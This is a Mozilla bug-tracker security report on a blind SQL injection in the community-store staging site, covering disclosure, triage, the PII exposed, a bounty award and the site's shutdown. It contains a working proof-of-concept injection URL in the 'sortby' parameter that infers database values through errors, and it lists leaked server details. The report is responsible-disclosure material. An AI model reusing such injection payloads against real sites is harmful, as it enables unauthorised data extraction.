Closed
Bug 650105
Opened 13 years ago
Closed 13 years ago
community-store.authstage.mozilla.com SQL Injection
Categories
(Websites :: communitystore.mozilla.org, defect)
Websites
communitystore.mozilla.org
Tracking
(Not tracked)
VERIFIED
WONTFIX
People
(Reporter: luca.defulgentis, Unassigned)
References
Details
(Whiteboard: [infrasec:sqlinject][ws:critical])
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.13) Gecko/20101206 Ubuntu/10.04 (lucid) Firefox/3.6.13 Build Identifier: Hello Mozilla, I found a SQL injection in "community-store.authstage.mozilla.com" web application. I was able to exploit the injection via "sortby" parameter and read MySQL variables value. The follows is a proof of concept exploit that I used in order to inference the database() variable length value: If the system var is 21 bytes len then the "(select 1 union select 2)" statements are executed triggering an application error. Otherwise no error message is displayed. https://community-store.authstage.mozilla.com/admin/review?order=asc&sortby=+if(length(database())=21,(select+1+union+select+2),type) I'm also reporting some variable's value inferenced thanks to the described method: user() => commstore@10.2.81.29 version() => 5.0.77-log database() => community_store_stage Thank you, Luca De Fulentis Reproducible: Always
Reporter | ||
Updated•13 years ago
|
Whiteboard: [infrasec:sqlinject]
Comment 1•13 years ago
|
||
Thanks for the report Luca. We're working to resolve the issue. Vulnerable code in upload.class.php L135 http://viewvc.svn.mozilla.org/vc/projects/community_store/trunk/models/upload.class.php?revision=29816&view=markup
Status: UNCONFIRMED → NEW
Component: www.mozillaonline.com → communitystore.mozilla.org
Ever confirmed: true
OS: Linux → All
QA Contact: www-mozillaonline-com → communitystore-mozilla-org
Hardware: x86 → All
Whiteboard: [infrasec:sqlinject] → [infrasec:sqlinject][ws:critical]
Comment 3•13 years ago
|
||
Admin page is turned off. This issue has been resolved. Please open a new bug to verify the security patch changes if the admin will be re-enabled.
Status: NEW → RESOLVED
Closed: 13 years ago
Resolution: --- → FIXED
Comment 4•13 years ago
|
||
A review of the supplied sql file for the site shows that the following information stored in the tables would be available to an attacker email, firstname, lastname, ip_address I've left out the other fields/bits that don't have a privacy impact in my opinion. Even if a user selects the "anonymous" option, the data supplied for email/firstname/lastname is inserted into the DB. The injection is in a SELECT statement query() which prevents multiple queries (INSERT, DELETE, UPDATE, etc) by design. However an attacker can still use subqueries and call mysql functions as demonstrated above.
Comment 5•13 years ago
|
||
community-store isn't on our bounty list, but this is exposing PII and (along with other bugs) prompted us to shut down the site so we're going to award this one $1000
Comment 6•13 years ago
|
||
All: bug 627082 is the tracking bug for all of the related community store security bugs. I emailed Silver Orange to find out if they have availability to do the code fixes. Most of the fixes will require changing from dynamic SQL statements to parametrized statements in the PHP code. If Silver Orange is not available, I will talk to Fred about the availability of any Flux developers. Thanks, cmore
Comment 7•13 years ago
|
||
The communitystore was only temporarily shut down. We are in the process of evaluating the pros and cons of fixing the security issues. This bug should stay open until that decision has been made. The website is only redirected and has been not been officially EOL'd. Thanks, Chris
Status: RESOLVED → REOPENED
Resolution: FIXED → ---
Comment 8•13 years ago
|
||
As per bug# 657516 , communitystore has been taken down. Changing this issue to RESOLVED
Status: REOPENED → RESOLVED
Closed: 13 years ago → 13 years ago
Resolution: --- → FIXED
Comment 9•13 years ago
|
||
please validate that this code has a note about this vulnerability in case somebody wants to use it for another purpose.
Group: websites-security
Status: RESOLVED → VERIFIED
Resolution: FIXED → WONTFIX
Updated•11 years ago
|
Flags: sec-bounty+
You need to log in
before you can comment on or make changes to this bug.
Description
•